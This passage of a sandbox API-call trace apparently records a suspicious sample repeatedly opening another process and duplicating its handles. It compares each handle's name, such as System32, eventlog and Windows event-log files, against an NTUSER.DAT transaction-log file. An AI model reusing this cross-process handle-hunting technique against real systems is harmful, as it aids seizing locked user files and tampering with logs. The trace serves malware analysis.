CloseHandle (hObject=0x1e8) returned 1 [0162.464] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0162.464] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.464] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.465] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.465] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.465] CloseHandle (hObject=0x1e4) returned 1 [0162.466] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0162.466] CloseHandle (hObject=0x194) returned 1 [0162.466] CloseHandle (hObject=0x1e8) returned 1 [0162.466] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.466] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.466] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.466] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.467] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.468] CloseHandle (hObject=0x1e4) returned 1 [0162.468] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.468] CloseHandle (hObject=0x194) returned 1 [0162.468] CloseHandle (hObject=0x1e8) returned 1 [0162.468] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.468] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.468] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.469] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.469] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.469] CloseHandle (hObject=0x1e4) returned 1 [0162.469] CloseHandle (hObject=0x194) returned 1 [0162.469] CloseHandle (hObject=0x1e8) returned 1 [0162.470] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.470] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x124, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.470] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.470] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.471] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.471] CloseHandle (hObject=0x1e4) returned 1 [0162.471] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0162.471] CloseHandle (hObject=0x194) returned 1 [0162.471] CloseHandle (hObject=0x1e8) returned 1 [0162.471] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.471] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x128, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.471] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.472] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.473] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.473] CloseHandle (hObject=0x1e4) returned 1 [0162.473] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0162.473] CloseHandle (hObject=0x194) returned 1 [0162.473] CloseHandle (hObject=0x1e8) returned 1 [0162.473] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.473] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.474] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.475] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.479] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.479] CloseHandle (hObject=0x1e4) returned 1 [0162.479] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0162.479] CloseHandle (hObject=0x194) returned 1 [0162.479] CloseHandle (hObject=0x1e8) returned 1 [0162.479] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.479] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x150, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.479] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.481] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.482] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.482] CloseHandle (hObject=0x1e4) returned 1 [0162.482] _wcsicmp (_Str1="\\lastalive1.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0162.482] CloseHandle (hObject=0x194) returned 1 [0162.482] CloseHandle (hObject=0x1e8) returned 1 [0162.482] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.482] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.482] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.483] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.485] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.485] CloseHandle (hObject=0x1e4) returned 1 [0162.485] _wcsicmp (_Str1="\\lastalive0.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0162.485] CloseHandle (hObject=0x194) returned 1 [0162.485] CloseHandle (hObject=0x1e8) returned 1 [0162.486] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.486] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.486] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.486] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.487] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.487] CloseHandle (hObject=0x1e4) returned 1 [0162.487] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.487] CloseHandle (hObject=0x194) returned 1 [0162.487] CloseHandle (hObject=0x1e8) returned 1 [0162.487] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.488] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x160, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.488] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.488] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.489] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.489] CloseHandle (hObject=0x1e4) returned 1 [0162.489] CloseHandle (hObject=0x194) returned 1 [0162.489] CloseHandle (hObject=0x1e8) returned 1 [0162.489] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.489] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x194, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.489] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.490] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.491] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.491] CloseHandle (hObject=0x1e4) returned 1 [0162.491] _wcsicmp (_Str1="\\CatalogChangeListener-2c8-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0162.491] CloseHandle (hObject=0x194) returned 1 [0162.491] CloseHandle (hObject=0x1e8) returned 1 [0162.491] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.491] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x19c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.491] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.492] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.492] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.492] CloseHandle (hObject=0x1e4) returned 1 [0162.492] CloseHandle (hObject=0x194) returned 1 [0162.493] CloseHandle (hObject=0x1e8) returned 1 [0162.493] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.493] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.493] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.493] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.494] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.494] CloseHandle (hObject=0x1e4) returned 1 [0162.494] CloseHandle (hObject=0x194) returned 1 [0162.494] CloseHandle (hObject=0x1e8) returned 1 [0162.494] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.494] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.494] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.495] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.496] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.496] CloseHandle (hObject=0x1e4) returned 1 [0162.496] CloseHandle (hObject=0x194) returned 1 [0162.496] CloseHandle (hObject=0x1e8) returned 1 [0162.496] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.496] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.496] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.497] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.498] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.498] CloseHandle (hObject=0x1e4) returned 1 [0162.498] _wcsicmp (_Str1="\\System.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.498] CloseHandle (hObject=0x194) returned 1 [0162.498] CloseHandle (hObject=0x1e8) returned 1 [0162.498] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.498] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.498] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.499] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.500] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.500] CloseHandle (hObject=0x1e4) returned 1 [0162.500] _wcsicmp (_Str1="\\Application.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.500] CloseHandle (hObject=0x194) returned 1 [0162.500] CloseHandle (hObject=0x1e8) returned 1 [0162.500] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.500] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.500] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.501] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.502] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.502] CloseHandle (hObject=0x1e4) returned 1 [0162.502] _wcsicmp (_Str1="\\Internet Explorer.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0162.503] CloseHandle (hObject=0x194) returned 1 [0162.503] CloseHandle (hObject=0x1e8) returned 1 [0162.503] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.503] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x204, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.503] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.504] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.504] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.505] CloseHandle (hObject=0x1e4) returned 1 [0162.505] _wcsicmp (_Str1="\\Security.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.505] CloseHandle (hObject=0x194) returned 1 [0162.505] CloseHandle (hObject=0x1e8) returned 1 [0162.505] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.505] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x210, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.505] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.506] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.507] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.507] CloseHandle (hObject=0x1e4) returned 1 [0162.507] _wcsicmp (_Str1="\\Windows PowerShell.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0162.507] CloseHandle (hObject=0x194) returned 1 [0162.507] CloseHandle (hObject=0x1e8) returned 1 [0162.507] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.507] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x214, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.507] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.508] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.509] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.509] CloseHandle (hObject=0x1e4) returned 1 [0162.509] _wcsicmp (_Str1="\\OAlerts.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 1 [0162.509] CloseHandle (hObject=0x194) returned 1 [0162.509] CloseHandle (hObject=0x1e8) returned 1 [0162.509] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.509] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x218, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.509] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.510] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.511] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.511] CloseHandle (hObject=0x1e4) returned 1 [0162.511] _wcsicmp (_Str1="\\Media Center.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.511] CloseHandle (hObject=0x194) returned 1 [0162.511] CloseHandle (hObject=0x1e8) returned 1 [0162.511] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.511] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.511] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.512] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.516] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.516] CloseHandle (hObject=0x1e4) returned 1 [0162.516] _wcsicmp (_Str1="\\Key Management Service.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0162.516] CloseHandle (hObject=0x194) returned 1 [0162.516] CloseHandle (hObject=0x1e8) returned 1 [0162.516] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.516] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x224, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.516] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.517] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.518] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.518] CloseHandle (hObject=0x1e4) returned 1 [0162.518] _wcsicmp (_Str1="\\HardwareEvents.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -6 [0162.518] CloseHandle (hObject=0x194) returned 1 [0162.518] CloseHandle (hObject=0x1e8) returned 1 [0162.518] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.518] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.518] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.519] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.519] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.520] CloseHandle (hObject=0x1e4) returned 1 [0162.520] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.520] CloseHandle (hObject=0x194) returned 1 [0162.520] CloseHandle (hObject=0x1e8) returned 1 [0162.520] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.520] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.520] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.520] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.521] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.521] CloseHandle (hObject=0x1e4) returned 1 [0162.521] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.521] CloseHandle (hObject=0x194) returned 1 [0162.521] CloseHandle (hObject=0x1e8) returned 1 [0162.521] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0162.521] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.521] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.522] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.523] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: 